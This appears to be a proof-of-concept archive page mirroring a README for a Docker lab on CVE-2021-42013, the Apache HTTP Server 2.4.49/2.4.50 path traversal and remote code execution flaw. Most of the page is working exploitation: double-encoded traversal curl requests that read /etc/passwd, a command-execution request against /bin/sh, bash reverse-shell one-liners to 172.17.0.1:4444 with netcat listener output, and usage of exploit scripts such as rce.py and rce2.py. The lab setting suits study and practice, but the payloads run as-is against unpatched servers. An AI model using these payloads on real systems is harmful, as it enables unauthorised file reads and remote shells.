Associated Vulnerability
Title:Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773) (CVE-2021-42013)Description:It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.
Description
Docker container lab to play/learn with CVE-2021-42013
Readme
# CVE-2021-42013
## Introduction
It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions [[1]](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013).
## Docker container lab to play/learn with CVE-2021-42013
1. File disclosure vulnerability configuration:
```bash
$ docker build -t apache-default default_conf
$ docker run -dit --name apache-app -p 81:80 apache-default
```
- Proof of Concept:
```bash
$ curl -s --path-as-is "http://172.17.0.2:80/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
```
- using `path_traversal_vuln.py`
```bash
$ python3 path_traversal_vuln.py -h
>> CVE-2021-42013 - Path Traversal
>> by twseptian
usage: path_traversal_vuln.py [-h] -t URL -p TARGET_PORT -x PAYLOAD -f FILE_READ
CVE-2021-42013 - Path Traversal
optional arguments:
-h, --help show this help message and exit
-t URL, --target URL Target IP
-p TARGET_PORT, --port TARGET_PORT
Target port
-x PAYLOAD, --execute PAYLOAD
Path Traversal Payload
-f FILE_READ, --file FILE_READ
File to read
```
```bash
$ python3 path_traversal_vuln.py -t 172.17.0.2 -p 80 -x '.%%32%65/.%%32%65/.%%32%65/.%%32%65' -f /etc/passwd
```
2. Remote Code Execution (CGI enabled) configuration:
```
$ docker build -t apache-cgi cgi_mod_enable
$ docker run -dit --name apache-lab -p 82:80 apache-cgi
```
- Proof of Concept:
```bash
$ curl -s --path-as-is -d "echo Content-Type: text/plain; echo; id" "http://172.17.0.3:80/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh"
uid=1(daemon) gid=1(daemon) groups=1(daemon)
```
- PoC using bash reverse shell
```bash
$ curl -s --path-as-is -d "echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/172.17.0.1/4444 0>&1" "http://172.17.0.3:80/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash"
```
- netcat output
```bash
$ nc -lvnp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 172.17.0.3.
Ncat: Connection from 172.17.0.3:35660.
daemon@dcbbed945af7:/bin$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
daemon@dcbbed945af7:/bin$
```
-using `rce.py`
```bash
$ python3 rce.py -h
>> CVE-2021-42013 - Remote Code Execution
>> by twseptian
usage: rce.py [-h] -t URL -p TARGET_PORT -x PAYLOAD -s SHELL
CVE-2021-42013 - Path Traversal
optional arguments:
-h, --help show this help message and exit
-t URL, --target URL Target IP
-p TARGET_PORT, --port TARGET_PORT
Target port
-x PAYLOAD, --execute PAYLOAD
Path Traversal Payload
-s SHELL, --shell SHELL
shell
```
```bash
$ python3 rce.py -t 172.17.0.3 -p 80 -x '%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65' -s "/bin/bash -c 'bash -i >& /dev/tcp/172.17.0.1/4444 0>&1'"
```
- netcat listener
```bash
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [172.17.0.1] from (UNKNOWN) [172.17.0.3] 41052
daemon@82f07f4b32a8:/bin$
```
- using `rce2.py`
```bash
$ python3 rce2.py -h
>> CVE-2021-42013 - Remote Code Execution
>> by twseptian
usage: rce2.py [-h] -t URL -p TARGET_PORT -L LOCALHOST -P LOCALPORT -x PAYLOAD
CVE-2021-42013 - Path Traversal
optional arguments:
-h, --help show this help message and exit
-t URL, --target URL Target IP
-p TARGET_PORT, --port TARGET_PORT
Target port
-L LOCALHOST, --lh LOCALHOST
Localhost/Local IP
-P LOCALPORT, --lp LOCALPORT
Localport
-x PAYLOAD, --execute PAYLOAD
Path Traversal Payload
```
```bash
$ python3 rce2.py -t 172.17.0.3 -p 80 -L 172.17.0.1 -P 4444 -x '.%%32%65/.%%32%65/.%%32%65/.%%32%65'
>> CVE-2021-42013 - Remote Code Execution
>> by twseptian
[!] Payload: .%%32%65/.%%32%65/.%%32%65/.%%32%65
[*] Setting up a netcat listener
listening on [any] 4444 ...
connect to [172.17.0.1] from (UNKNOWN) [172.17.0.3] 41122
bash: initialize_job_control: no job control in background: Bad file descriptor
daemon@82f07f4b32a8:/bin$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
daemon@82f07f4b32a8:/bin$
```
References
- [[1] CVE-2021-42013](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013)
- [[2] Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE)](https://www.exploit-db.com/exploits/50406)
File Snapshot
[4.0K] /data/pocs/9362cdefe926e167bf69989ad3fe8666301614aa
├── [4.0K] cgi_mod_enable
│ ├── [ 71] Dockerfile
│ └── [ 20K] httpd.conf
├── [4.0K] default_conf
│ ├── [ 71] Dockerfile
│ └── [ 20K] httpd.conf
├── [ 99K] path_traversal.png
├── [2.8K] path_traversal_vuln.py
├── [3.1K] rce1.py
├── [ 33K] rce2.png
├── [3.7K] rce2.py
├── [ 40K] rce.png
└── [6.3K] README.md
2 directories, 11 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →